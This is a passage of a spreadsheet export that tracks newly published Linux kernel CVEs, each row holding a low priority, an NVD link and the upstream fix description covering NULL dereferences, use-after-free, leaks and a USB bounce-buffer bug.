      <c r="R1634" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ima: Check for ERR_PTR from dentry_path() in validate_hash_algo()
dentry_path() returns ERR_PTR(-ENAMETOOLONG) when the path exceeds the
buffer. validate_hash_algo() passes the result straight to
integrity_audit_msg() without checking. ERR_PTR is not NULL, so
integrity_audit_message() sees a valid pointer and calls strlen() on
it, which faults:
    BUG: unable to handle page fault for address: ffffffffffffffdc
    RIP: 0010:strlen+0x30/0xa0
    Call Trace:
     audit_log_untrustedstring+0x19/0x30
     integrity_audit_message+0x366/0x4f0
     ima_inode_setxattr+0x512/0x5f0
Check for IS_ERR() and use NULL instead, which makes the audit message
skip the name= field instead of crashing.</t>
        </is>
      </c>
      <c r="S1634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89989</t>
        </is>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89991</t>
        </is>
      </c>
      <c r="D1635" s="5" t="inlineStr"/>
      <c r="E1635" s="5" t="inlineStr"/>
      <c r="F1635" s="5" t="inlineStr"/>
      <c r="G1635" s="5" t="inlineStr"/>
      <c r="H1635" s="5" t="inlineStr"/>
      <c r="I1635" s="5" t="inlineStr"/>
      <c r="J1635" s="5" t="inlineStr"/>
      <c r="K1635" s="5" t="inlineStr"/>
      <c r="L1635" s="5" t="inlineStr"/>
      <c r="M1635" s="5" t="inlineStr"/>
      <c r="N1635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1635" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1635" s="5" t="inlineStr"/>
      <c r="Q1635" s="5" t="inlineStr"/>
      <c r="R1635" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix infinite loop in pcpu_freelist push with one possible CPU
__pcpu_freelist_push() can loop forever when only one CPU is possible
and an NMI re-enters pcpu_freelist_push() while the interrupted context
holds that CPU's freelist lock.
After the current-CPU fast path fails, the fallback loop walks
cpu_possible_mask while skipping the current CPU. With CONFIG_SMP=n, or
when an SMP kernel is limited to one possible CPU with nr_cpus=1 or
possible_cpus=1, there are no other possible CPUs to examine. The loop
therefore makes no lock acquisition attempt and can never make progress.
The following stack was observed on a UP system:
  NMI context:
    pcpu_freelist_push
    free_htab_elem
    htab_map_delete_elem
    [perf-event BPF program]
    __perf_event_overflow
    perf_event_nmi_handler
    exc_nmi
  Interrupted context:
    __pcpu_freelist_push
    pcpu_freelist_push
    free_htab_elem
    htab_map_delete_elem
    [raw_tp/sys_enter BPF program]
    __bpf_trace_sys_enter
    do_syscall_64
raw_res_spin_lock() detects the same-CPU recursive acquisition and
returns -EDEADLK, but the subsequent fallback loop has no candidate head
on a system with one possible CPU.
Restore the extra fallback head that existed before the rqspinlock
conversion. Keep the current-CPU fast path, then try the other possible
CPUs and finally the extra head. The additional head lets a push, which
cannot fail without losing a preallocated element, make progress when the
only per-CPU head is held by the interrupted context.
Also check the extra head from the pop path so that nodes placed there
can be reused.</t>
        </is>
      </c>
      <c r="S1635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89991</t>
        </is>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89993</t>
        </is>
      </c>
      <c r="D1636" s="5" t="inlineStr"/>
      <c r="E1636" s="5" t="inlineStr"/>
      <c r="F1636" s="5" t="inlineStr"/>
      <c r="G1636" s="5" t="inlineStr"/>
      <c r="H1636" s="5" t="inlineStr"/>
      <c r="I1636" s="5" t="inlineStr"/>
      <c r="J1636" s="5" t="inlineStr"/>
      <c r="K1636" s="5" t="inlineStr"/>
      <c r="L1636" s="5" t="inlineStr"/>
      <c r="M1636" s="5" t="inlineStr"/>
      <c r="N1636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1636" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1636" s="5" t="inlineStr"/>
      <c r="Q1636" s="5" t="inlineStr"/>
      <c r="R1636" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: Initialize IRQ data before requesting IRQs
dw_edma_irq_request() passes struct dw_edma_irq to request_irq() before
dw_edma_channel_setup() fills the back pointer. A shared interrupt can
therefore enter the handler with dw_irq-&gt;dw still NULL, leading to a
NULL pointer dereference.
Set the back pointer before installing each handler.</t>
        </is>
      </c>
      <c r="S1636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89993</t>
        </is>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89996</t>
        </is>
      </c>
      <c r="D1637" s="5" t="inlineStr"/>
      <c r="E1637" s="5" t="inlineStr"/>
      <c r="F1637" s="5" t="inlineStr"/>
      <c r="G1637" s="5" t="inlineStr"/>
      <c r="H1637" s="5" t="inlineStr"/>
      <c r="I1637" s="5" t="inlineStr"/>
      <c r="J1637" s="5" t="inlineStr"/>
      <c r="K1637" s="5" t="inlineStr"/>
      <c r="L1637" s="5" t="inlineStr"/>
      <c r="M1637" s="5" t="inlineStr"/>
      <c r="N1637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1637" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1637" s="5" t="inlineStr"/>
      <c r="Q1637" s="5" t="inlineStr"/>
      <c r="R1637" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dma-buf: dma-heap: don't publish fd before copy_to_user() succeeds
DMA_HEAP_IOCTL_ALLOC allocates a dma-buf and installs an fd into the
caller's fd table via dma_buf_fd() -&gt; fd_install() before
dma_heap_ioctl() copies the result back to userspace.  If the trailing
copy_to_user() fails, userspace never learns the fd number, but the
fd (and the underlying dma-buf reference) are already visible to
other threads in the same process and are leaked for the lifetime of
the process.
The obvious "close it on the failure path" fix is unsafe: once
fd_install() has run, another thread can already dup() the fd, send
it via SCM_RIGHTS, or close() it and let its number be reused, so a
subsequent close_fd() from the ioctl path can operate on an unrelated
file.  This was pointed out by Christian König on v1 [1].
Restructure the allocation path so that fd_install() is the last,
unfailable step of a successful ioctl:
  1. heap-&gt;ops-&gt;allocate()      creates the dma_buf.
  2. get_unused_fd_flags()      reserves an fd number in the caller's
                                fd table without publishing it, so
                                no other thread can observe it.
  3. copy_to_user()             delivers the fd number to userspace;
                                on failure the fd is returned with
                                put_unused_fd() and the dma_buf
                                reference is dropped with
                                dma_buf_put(), leaving no user-
                                visible state behind.
  4. dma_buf_fd_install()       publishes the fd and emits the
                                trace_dma_buf_fd tracepoint -- from
                                here on the ioctl cannot fail.
A new dma_buf_fd_install() helper is introduced in dma-buf.c to wrap
fd_install() together with the DMA_BUF_TRACE() call, preserving the
export tracing that dma_buf_fd() provides.  dma_heap_ioctl_allocate()
is refactored to return the struct dma_buf * directly (returning
ERR_PTR on failure) so the caller holds the dmabuf reference across
steps 3 and 4.
The failure at step 3 is easily reachable from userspace: pass a
struct dma_heap_allocation_data that lives in a page whose protection
is flipped to PROT_READ between copy_from_user() and copy_to_user()
(e.g. via mprotect()).  Before this change each such ioctl leaks one
dmabuf fd; after it, the fd table is unchanged on failure and only
/dev/dma_heap/&lt;name&gt; remains open.
No UAPI or heap-driver interface change.
[1] https://lore.kernel.org/dri-devel/175e98de-f414-47d7-81c1-c0fe0a8f7f62@amd.com/</t>
        </is>
      </c>
      <c r="S1637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89996</t>
        </is>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90004</t>
        </is>
      </c>
      <c r="D1638" s="5" t="inlineStr"/>
      <c r="E1638" s="5" t="inlineStr"/>
      <c r="F1638" s="5" t="inlineStr"/>
      <c r="G1638" s="5" t="inlineStr"/>
      <c r="H1638" s="5" t="inlineStr"/>
      <c r="I1638" s="5" t="inlineStr"/>
      <c r="J1638" s="5" t="inlineStr"/>
      <c r="K1638" s="5" t="inlineStr"/>
      <c r="L1638" s="5" t="inlineStr"/>
      <c r="M1638" s="5" t="inlineStr"/>
      <c r="N1638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1638" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1638" s="5" t="inlineStr"/>
      <c r="Q1638" s="5" t="inlineStr"/>
      <c r="R1638" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/damon/core: handle region split failure in apply_min_nr_regions()
damon_apply_min_nr_regions() repeatedly split each region until its size
becomes small enough to meet the user-defined low limit of the number of
regions.  The loop assumes the split operation (damon_split_region_at())
will always succeed and create the new region.  But the operation could
silently fail for memory allocation failures, for example.
If such failure happens and the region was the last region, the linked
list-based next region fetching returns invalid pointer.  As a result,
invalid memory dereference and corruption could happen.  Even if the
corner case is handled, it imposes stress to the allocator by trying split
regions for other targets.  Fix the issue by breaking all the loops for
any region split failure.
This means there could be a min_nr_regions violation.  It will only rarely
happen since the allocation is arguably too small to fail.  Even if it
happens, it is only temporal.  damon_apply_min_nr_regions() will be called
again after the aggregation interval.
The user impact of the issue should be minor, since the allocation is
arguably too small to fail.  But, it could still theoretically happen, and
the consequence is very bad.
This issue was discovered [1] by Sashiko.</t>
        </is>
      </c>
      <c r="S1638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90004</t>
        </is>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90005</t>
        </is>
      </c>
      <c r="D1639" s="5" t="inlineStr"/>
      <c r="E1639" s="5" t="inlineStr"/>
      <c r="F1639" s="5" t="inlineStr"/>
      <c r="G1639" s="5" t="inlineStr"/>
      <c r="H1639" s="5" t="inlineStr"/>
      <c r="I1639" s="5" t="inlineStr"/>
      <c r="J1639" s="5" t="inlineStr"/>
      <c r="K1639" s="5" t="inlineStr"/>
      <c r="L1639" s="5" t="inlineStr"/>
      <c r="M1639" s="5" t="inlineStr"/>
      <c r="N1639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1639" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1639" s="5" t="inlineStr"/>
      <c r="Q1639" s="5" t="inlineStr"/>
      <c r="R1639" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
samples/damon/wsse: handle damon_start() failure
Patch series "samples/damon: handle damon_{start,stop}() failures".
All DAMON sample modules are not correctly handling failures from
damon_start().  Among those, mtier also has an additional problem for
handling of damon_stop() failures.  wsse and prcl also have a problem in
their damon_call() failure handling.  As a result, memory leaks, next
DAMON operation disruptions, and use-after-free can happen.  Fix those.
Note that only the damon_start() failure caused issues can reliably be
reproduced.  Reproducing those issues require the admin permission,
though.
This patch (of 6):
damon_sample_wsse_start() callers assume it will clean up resources when
it fails.  And the function does the cleanup for context buildup failures.
However, it is not doing the cleanup for damon_start() failure.  As a
result, when damon_start() fails, it leaks the memory for DAMON context. 
Free the context in case of the failure to fix the issues.
Note that the issue can reliably be reproduced because the module calls
damon_start() in the exclusive mode.  For example,
    $ sudo damo start
    $ echo $$ | sudo tee /sys/module/damon_sample_wsse/parameters/target_pid
    $ echo Y | sudo tee /sys/module/damon_sample_wsse/parameters/enabled
    $ sudo cat /proc/allocinfo | grep damon_new_ctx
Because the first command is running another DAMON instance, the third
command fails the damon_start() call because the new DAMON instance cannot
exclusively run.  And without this fix, by repeating the third and the
fourth commands above, we can show the memory consumption is only
increasing due to the leaks.  It requires the sudo permission though.
The issue was discovered [1] by Sashiko.</t>
        </is>
      </c>
      <c r="S1639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90005</t>
        </is>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90006</t>
        </is>
      </c>
      <c r="D1640" s="5" t="inlineStr"/>
      <c r="E1640" s="5" t="inlineStr"/>
      <c r="F1640" s="5" t="inlineStr"/>
      <c r="G1640" s="5" t="inlineStr"/>
      <c r="H1640" s="5" t="inlineStr"/>
      <c r="I1640" s="5" t="inlineStr"/>
      <c r="J1640" s="5" t="inlineStr"/>
      <c r="K1640" s="5" t="inlineStr"/>
      <c r="L1640" s="5" t="inlineStr"/>
      <c r="M1640" s="5" t="inlineStr"/>
      <c r="N1640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1640" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1640" s="5" t="inlineStr"/>
      <c r="Q1640" s="5" t="inlineStr"/>
      <c r="R1640" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
samples/damon/mtier: handle damon_stop() failure
damon_sample_mtier_stop() assumes its damon_stop() call will always
successfully stops the two DAMON contexts.  Hence it deallocates the two
DAMON contexts after the damon_stop() call.  However, if a given context
is already stopped, damon_stop() fails and returns an error while letting
the DAMON contexts that have not yet stopped keep running.  This kind of
unexpected early DAMON context stops could happen due to memory allocation
failures in kdamond_fn().  Because damon_sample_mtier_stop() just
deallocates all DAMON contexts with damon_target and damon_region objects
that are linked to the contexts, the execution of the unstopped DAMON
context (kdamond) ends up using the memory that freed (use-after-free). 
Fix the issue by separating the damon_stop() to be invoked per context.
Note that DAMON_SYSFS also allows multiple DAMON contexts execution.  But,
it calls damon_stop() for each context one by one.  Hence this issue is
only in mtier.
For the long term, it would be better to refactor damon_stop() to always
ensure stopping all contexts regardless of the failures in the middle. 
Make this fix in the current way, though, to keep it simple and easy to
backport.  I will do the refactoring later.
The issue was discovered [1] by Sashiko.</t>
        </is>
      </c>
      <c r="S1640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90006</t>
        </is>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90015</t>
        </is>
      </c>
      <c r="D1641" s="5" t="inlineStr"/>
      <c r="E1641" s="5" t="inlineStr"/>
      <c r="F1641" s="5" t="inlineStr"/>
      <c r="G1641" s="5" t="inlineStr"/>
      <c r="H1641" s="5" t="inlineStr"/>
      <c r="I1641" s="5" t="inlineStr"/>
      <c r="J1641" s="5" t="inlineStr"/>
      <c r="K1641" s="5" t="inlineStr"/>
      <c r="L1641" s="5" t="inlineStr"/>
      <c r="M1641" s="5" t="inlineStr"/>
      <c r="N1641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1641" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1641" s="5" t="inlineStr"/>
      <c r="Q1641" s="5" t="inlineStr"/>
      <c r="R1641" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xhci: fix lost bounce buffers on TDs spanning several ring segments
When a TD reaches a link TRB with data that is not aligned to the
endpoint's wMaxPacketSize, xhci_align_td() stages the unalignable tail
through the bounce buffer of the ring segment holding that link TRB.
xhci_unmap_td_bounce_buffer() later unmaps it and, for IN transfers,
copies the data back into the URB's buffer.
The enqueue path records the segment that was bounced in td-&gt;bounce_seg,
under the assumption that a TD never spans more than two ring segments.
That assumption does not hold: a TD large enough to span three or more
segments crosses several link TRBs and can be bounced at each of them.
Only the last one survives in td-&gt;bounce_seg, so every earlier bounce
buffer is neither copied back nor DMA unmapped.
The URB still completes with actual_length equal to the requested length
and no error, so the transfer looks successful while a wMaxPacketSize
sized hole in the destination buffer silently keeps its previous
contents. It also leaks a DMA mapping per dropped bounce.
Any sufficiently large and fragmented bulk transfer can hit this. It was
found with a USB mass storage device behind xHCI backing a dm-verity
target with 512 byte hash blocks, where the stale data is detected rather
than silently consumed. The device enumerates as SuperSpeed, so
wMaxPacketSize is 1024, while dm-bufio issues one 512 byte bio per hash
block. verity_prefetch_io() makes the block layer merge hundreds of them
into a single request of up to 512 scatterlist entries of 512 bytes each.
At 256 TRBs per ring segment such a TD spans three segments, and every
segment boundary falls on an odd multiple of 512, i.e. unaligned to
wMaxPacketSize. dm-bufio then caches a hash block holding stale data and
dm-verity declares the metadata block corrupted:
  device-mapper: verity: 8:2: metadata block 10850 is corrupted
A reproducer running this under qemu is available at
https://github.com/baloo/xhci-verity
The bounce state (bounce_buf, bounce_dma, bounce_len, bounce_offs)
already lives on the ring segment, so there is nothing extra to track.
Keep recording the last bounced segment in td-&gt;bounce_seg and, on
completion, walk the segments from td-&gt;start_seg up to it, unmapping
every segment that still has a pending bounce.
Stopping at td-&gt;bounce_seg rather than td-&gt;end_seg matters: a bounce
implies the TD continues past that segment's link TRB, so bounce_seg is
always strictly before end_seg, and a later TD may already have started
in end_seg and been bounced there. Walking that far would copy a foreign
bounce buffer into this URB and unmap it twice. It also keeps the walk
correct if a TD ever wraps the whole ring so that end_seg == start_seg.
[mn: Add ring-&gt;num_segs check to prevent unlikely infinite for loop.]</t>
        </is>
      </c>
      <c r="S1641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90015</t>
        </is>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90019</t>
        </is>
      </c>
      <c r="D1642" s="5" t="inlineStr"/>
      <c r="E1642" s="5" t="inlineStr"/>
      <c r="F1642" s="5" t="inlineStr"/>
      <c r="G1642" s="5" t="inlineStr"/>
      <c r="H1642" s="5" t="inlineStr"/>
      <c r="I1642" s="5" t="inlineStr"/>
      <c r="J1642" s="5" t="inlineStr"/>
      <c r="K1642" s="5" t="inlineStr"/>
      <c r="L1642" s="5" t="inlineStr"/>
      <c r="M1642" s="5" t="inlineStr"/>
      <c r="N1642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1642" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1642" s="5" t="inlineStr"/>
      <c r="Q1642" s="5" t="inlineStr"/>
      <c r="R1642" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: fix null pointer dereference in usb_put_function_instance()
usb_put_function_instance() attempts to dereference fd inside fi struct
to get mod in uvc_alloc_inst() error path. However, fd is not allocated
until later in try_get_usb_function_instance() after allocating fi in
uvc_alloc_inst() and thus guranteed to be null in error path. Fix this
by adding a null check for fi-&gt;fd that returns if fd is null.</t>
        </is>
      </c>
      <c r="S1642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90019</t>
        </is>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90020</t>
        </is>
      </c>
      <c r="D1643" s="5" t="inlineStr"/>
      <c r="E1643" s="5" t="inlineStr"/>
      <c r="F1643" s="5" t="inlineStr"/>
      <c r="G1643" s="5" t="inlineStr"/>
      <c r="H1643" s="5" t="inlineStr"/>
      <c r="I1643" s="5" t="inlineStr"/>
      <c r="J1643" s="5" t="inlineStr"/>
      <c r="K1643" s="5" t="inlineStr"/>
      <c r="L1643" s="5" t="inlineStr"/>
      <c r="M1643" s="5" t="inlineStr"/>
      <c r="N1643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1643" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1643" s="5" t="inlineStr"/>
      <c r="Q1643" s="5" t="inlineStr"/>
      <c r="R1643" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
USB: gadget: fix NULL pointer dereference in gadget_dev_ioctl()
gadget_dev_ioctl() reads dev-&gt;gadget before acquiring dev-&gt;lock, but
dev-&gt;state is checked after acquiring the lock. Therefore a concurrent
bind can change the device state between these operations, which can
leave ioctl with a stale NULL gadget pointer and causing a NULL pointer
dereference at gadget-&gt;ops-&gt;ioctl.
Read dev-&gt;gadget while holding dev-&gt;lock so that the gadget pointer
and device state are sampled consistently.</t>
        </is>
      </c>
      <c r="S1643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90020</t>
        </is>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90021</t>
        </is>
      </c>
      <c r="D1644" s="5" t="inlineStr"/>
      <c r="E1644" s="5" t="inlineStr"/>
      <c r="F1644" s="5" t="inlineStr"/>
      <c r="G1644" s="5" t="inlineStr"/>
      <c r="H1644" s="5" t="inlineStr"/>
      <c r="I1644" s="5" t="inlineStr"/>
      <c r="J1644" s="5" t="inlineStr"/>
      <c r="K1644" s="5" t="inlineStr"/>
      <c r="L1644" s="5" t="inlineStr"/>
      <c r="M1644" s="5" t="inlineStr"/>
      <c r="N1644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1644" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1644" s="5" t="inlineStr"/>
      <c r="Q1644" s="5" t="inlineStr"/>
      <c r="R1644" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_midi: initialize work in f_midi_alloc()
f_midi_alloc initializes free_ref to 1 and it can only be incremented
when a sound card is registered via f_midi_register_card().
f_midi_register_card() is only called in f_midi_bind() which actually
performs INIT_WORK. If f_midi_bind() is never run, work is not
initialized and the if condition in f_midi_free becomes true,
this results in a warning later in __flush_work as work-&gt;func = 0.
Fix this by moving INIT_WORK from f_midi_bind() to f_midi_alloc().</t>
        </is>
      </c>
      <c r="S1644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90021</t>
        </is>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90023</t>
        </is>
      </c>
      <c r="D1645" s="5" t="inlineStr"/>
      <c r="E1645" s="5" t="inlineStr"/>
      <c r="F1645" s="5" t="inlineStr"/>
      <c r="G1645" s="5" t="inlineStr"/>
      <c r="H1645" s="5" t="inlineStr"/>
      <c r="I1645" s="5" t="inlineStr"/>
      <c r="J1645" s="5" t="inlineStr"/>
      <c r="K1645" s="5" t="inlineStr"/>
      <c r="L1645" s="5" t="inlineStr"/>
      <c r="M1645" s="5" t="inlineStr"/>
      <c r="N1645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1645" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1645" s="5" t="inlineStr"/>
      <c r="Q1645" s="5" t="inlineStr"/>
      <c r="R1645" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_mass_storage: fix null pointer dereference in fsg_common_set_num_buffers()
Previously fsg_num_buffers_validate() was removed as it was not
necessary due to Kconfig setting the limits for n from 2 to 256 with
default as 2. However, setting the page content in such a way that
kstrtou8() reflects n value as either 0 or 1 bypasses these
restrictions leading to a null pointer dereference if n is 0. Fix
this by adding a check for n &lt; 2 and returning -EINVAL if n is
either 0 or 1 consistent with Kconfig logic.</t>
        </is>
      </c>
      <c r="S1645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90023</t>
        </is>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90024</t>
        </is>
      </c>
      <c r="D1646" s="5" t="inlineStr"/>
      <c r="E1646" s="5" t="inlineStr"/>
      <c r="F1646" s="5" t="inlineStr"/>
      <c r="G1646" s="5" t="inlineStr"/>
      <c r="H1646" s="5" t="inlineStr"/>
      <c r="I1646" s="5" t="inlineStr"/>
      <c r="J1646" s="5" t="inlineStr"/>
      <c r="K1646" s="5" t="inlineStr"/>
      <c r="L1646" s="5" t="inlineStr"/>
      <c r="M1646" s="5" t="inlineStr"/>
      <c r="N1646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1646" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1646" s="5" t="inlineStr"/>
      <c r="Q1646" s="5" t="inlineStr"/>
      <c r="R1646" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: midi2: Fix null-pointer dereference in f_midi2_free_ep_reqs
A null-pointer dereference occurs in f_midi2_free_ep_reqs() when attempting
to clean up an endpoint that was never initialized.
When configuring the MIDI 2.0 gadget via configfs and setting the block
direction to SNDRV_UMP_DIR_INPUT, the initialization of the midi1_ep_out
endpoint is explicitly skipped during the gadget bind phase
(f_midi2_bind()). As a result, the usb_ep-&gt;card field remains NULL.
Later, when the host sets the alternate setting, f_midi2_set_alt()
unconditionally stops both the IN and OUT endpoints by calling
f_midi2_stop_eps(), which in turn calls f_midi2_free_ep_reqs() for both
endpoints. When f_midi2_free_ep_reqs() is called for the uninitialized
midi1_ep_out, it attempts to dereference usb_ep-&gt;card to determine the
number of requests to free, leading to a crash.
Fix this by using usb_ep-&gt;num_reqs instead of usb_ep-&gt;card-&gt;info.num_reqs
in f_midi2_free_ep_reqs(). usb_ep-&gt;num_reqs is correctly set during
f_midi2_init_ep() and remains 0 if the endpoint was never initialized,
safely avoiding the loop. For consistency, apply the same change to
f_midi2_alloc_ep_reqs().
Oops: general protection fault, probably for non-canonical address
0xdffffc00000000ee: 0000 [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000770-0x0000000000000777]
...
RIP: 0010:f_midi2_free_ep_reqs drivers/usb/gadget/function/f_midi2.c:1166
[inline]
RIP: 0010:f_midi2_stop_eps+0x28e/0x4d0
drivers/usb/gadget/function/f_midi2.c:1246
...
Call Trace:
 &lt;TASK&gt;
 f_midi2_set_alt+0x11c/0xf00 drivers/usb/gadget/function/f_midi2.c:1296
 composite_setup+0x1ffd/0x3480 drivers/usb/gadget/composite.c:1933
 configfs_composite_setup+0xbd/0x100 drivers/usb/gadget/configfs.c:1877</t>
        </is>
      </c>
      <c r="S1646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90024</t>
        </is>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90028</t>
        </is>
      </c>
